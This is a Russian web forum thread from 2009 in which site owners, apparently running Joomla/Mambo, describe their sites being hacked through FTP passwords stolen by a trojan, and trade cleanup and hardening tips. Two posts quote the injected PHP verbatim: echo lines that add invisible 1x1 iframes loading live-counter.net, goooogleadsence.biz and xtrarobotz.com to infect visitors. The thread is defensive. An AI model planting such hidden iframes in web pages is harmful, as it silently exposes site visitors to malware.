Сайт взломали. Удалось восстановить, но вопрос безопасности остался актуальным

Тема в разделе "Вопросы безопасности", создана пользователем liga, 22.01.2009.

  1. Bellatrix
    Offline

    Bellatrix Недавно здесь

    Регистрация:
    21.11.2008
    Сообщения:
    76
    Симпатии:
    5
    Пол:
    Мужской
    Может ещё к базе пароли поменять?
    Долго ли их по ФТП из конфига прочесть...
    И проверить, нет ли на сайте папок с правами 777.
    Кэш сайта временно запретить и очистить.
    Теоретически не должны пролезть.
     
  2. Offline

    Ирина Ревин Недавно здесь

    Регистрация:
    19.08.2008
    Сообщения:
    74
    Симпатии:
    1
    Пол:
    Мужской
    ок, и к базе счас пароль поменяю... в коре сайта все папки с правами 755..

    Но проблема таки остается!
    самом index.php сайта его нету, если открываю сайт в хтмл не заходя в админку тож нету..
    а вот когда открываю из админки (открывается в блокноте в файле index2(1))


    где и что подчистить нужно?
     
  3. Offline

    Egoz Пользователь

    Регистрация:
    01.06.2006
    Сообщения:
    60
    Симпатии:
    0
    Пол:
    Мужской
    а как это сделать? что надо искать? какие-нить посторонние файлы?
    я уже все папки с файлами index.php (html) почистил от этого левого кода + проверял все пространство встроенным антивирусом из cPanel'и
    как можно найти этот самый источник?
     
  4. Asylum
    Offline

    Asylum Местный => Cпециалист <=

    Регистрация:
    09.02.2007
    Сообщения:
    2 744
    Симпатии:
    160
    Пол:
    Мужской
    Прочитай еще все раз описанное выше, это не тот случай, когда решишь все проблемы что то, где то поправив. Антивирусом на хостинге ничего найдешь, потому что там его нет. Там есть небольшой код, который ведет пользователя зашедшего на твой сайт на другой сайт, где ему и "ставят" трояна. Вирус у тебя на компьютере.....
     
  5. koreeckz
    Offline

    koreeckz Активист => Cпециалист <=

    Регистрация:
    03.03.2009
    Сообщения:
    422
    Симпатии:
    30
    Пол:
    Мужской
    Ирина Ревин, заходишь через тотал коммандер на фтп в корень сайта, прописываешь код айфрэйма в ключевых словах в поиске, он выдаст список файлов содержащих код, редактируешь их и радуешься )
     
  6. Offline

    Ирина Ревин Недавно здесь

    Регистрация:
    19.08.2008
    Сообщения:
    74
    Симпатии:
    1
    Пол:
    Мужской
    Уже)) Все почистила руками, поменяла пароли на базы, фтп и админку.. радуюсь, пока рецидива не наблюдается)
     
  7. Offline

    termit Недавно здесь

    Регистрация:
    20.02.2009
    Сообщения:
    3
    Симпатии:
    0
    Народ, Вы чего тупые чтоли, не ужели никто не заметил что редирект идет на cocacolaN, то есть данный чел заразил мимнимум 65 сайтов, отсюда делаем вывод.


    1. проверьте свой форум phpbb- дрявый он жуть
    2. наверное у Вас регистрация на сайте разрешена? Если разрешена в 0.15 то лучше запретите ее, объяснять не буду, сами не глупые надеюсь
    3. ставим на все 755 права, а не 777
    4. не используем постороннии компоненты
    5. на порно сайты ходим быстро и поделу. И желательно с чистой машины.
    6. Ставим лицензионную винду.

    Ну и самый надежный способ не выходим в интернет вообще.
     
  8. Offline

    _voland_ Местный => Cпециалист <=

    Регистрация:
    12.04.2008
    Сообщения:
    2 171
    Симпатии:
    102
    Пол:
    Мужской
    Оффтопик (не в тему) - жми сюда!
     
  9. Gronpipmaster
    Offline

    Gronpipmaster Недавно здесь => Cпециалист <=

    Регистрация:
    21.01.2009
    Сообщения:
    1 392
    Симпатии:
    62
    Пол:
    Мужской
    или фри линух, винда обсалютно не причем всякой дряни повидал, и та и та заражаеться как делать нефиг, и не согласен
    Код (CODE):
    1. Народ, Вы чего тупые чтоли
    люди помочь пытаются, а зайти и "кинуть в толпу гадости" каждый может.
     
  10. Asylum
    Offline

    Asylum Местный => Cпециалист <=

    Регистрация:
    09.02.2007
    Сообщения:
    2 744
    Симпатии:
    160
    Пол:
    Мужской
    Именно в ей он живет (вирь)
     
  11. liga
    Offline

    liga Пользователь

    Регистрация:
    21.10.2008
    Сообщения:
    495
    Симпатии:
    18
    Пол:
    Мужской
    Оффтопик (не в тему) - жми сюда!
     
  12. jokpop
    Offline

    jokpop Недавно здесь

    Регистрация:
    26.11.2008
    Сообщения:
    49
    Симпатии:
    12
    Пол:
    Мужской
    Вчера была атака, после чего шаблон сайта вырубила ошибками, а в index как шаблона так и админа появились строчки
    Код (CODE):
    1. <?php mosLoadAdminModules( 'debug' );
    2. echo "<iframe src=\"http://live-counter.net/?click=24692890\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
    3. ?>
    по url требуют пароль, а на втором нет ничего. что делать, каспер при открытие сайта ругнулся трояном!
     
  13. Asylum
    Offline

    Asylum Местный => Cпециалист <=

    Регистрация:
    09.02.2007
    Сообщения:
    2 744
    Симпатии:
    160
    Пол:
    Мужской
    Тема стала актуальной, может есть повод написать развернутый фак по основам защиты
     
  14. infoman
    Offline

    infoman Пользователь

    Регистрация:
    28.08.2007
    Сообщения:
    581
    Симпатии:
    12
    Пол:
    Мужской
    а что антивирусы совсем лысые?
     
  15. Asylum
    Offline

    Asylum Местный => Cпециалист <=

    Регистрация:
    09.02.2007
    Сообщения:
    2 744
    Симпатии:
    160
    Пол:
    Мужской
    Если вирь не занесен в базу и не ведет себя как слон в посудной лавке
     
  16. Offline

    kahcepb Недавно здесь

    Регистрация:
    09.04.2009
    Сообщения:
    3
    Симпатии:
    0
    Пол:
    Мужской
    Тож недавно поломали, код был прописан где только можно

    echo "<iframe src=\"http://goooogleadsence.biz/?click=3D5B003\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

    echo "<iframe src=\"http://live-counter.net/?click=9703578\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

    echo "<iframe src=\"http://xtrarobotz.com/?click=24EC45\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

    посмотрел логи на сервере, все заливалось через фтп, сменил пароли на все...
    При проверке компьютера доктор вебем (последним) вирусов не обнаружено, зато Outpost постоянно пресикает попытки что либо скачать всякими не понятными экзешниками, а так же изменения файлов.
    Буду ставить другой антивирь, пока на ftp не логинюсь... боюсь опять пароль уйдет
     
  17. Offline

    _voland_ Местный => Cпециалист <=

    Регистрация:
    12.04.2008
    Сообщения:
    2 171
    Симпатии:
    102
    Пол:
    Мужской
    Для защиты рекомендую Avira для лечения - AVZ
     
  18. Offline

    kahcepb Недавно здесь

    Регистрация:
    09.04.2009
    Сообщения:
    3
    Симпатии:
    0
    Пол:
    Мужской
    касперский нашел 2 вируса, один из них сидел в тотал командере (через который я заливал все на фтп)... надеюсь теперь будет все нормально
     
  19. Offline

    _voland_ Местный => Cпециалист <=

    Регистрация:
    12.04.2008
    Сообщения:
    2 171
    Симпатии:
    102
    Пол:
    Мужской
    Ненормально то что они попали в систему!!!
     
  20. infoman
    Offline

    infoman Пользователь

    Регистрация:
    28.08.2007
    Сообщения:
    581
    Симпатии:
    12
    Пол:
    Мужской
    да да да
    меня нортон бережотт :) корпоративный :)
    а тотолами вообще не пользуюсь (ибо корпоративный прокси (ограничение по портам (против инет вирусов)) по моему гораздо для управления сайтом использовать отдельный браузер https, ssh туннель, пропуская всё это гомно через vpn туннель....
     

Поделиться этой страницей

Загрузка...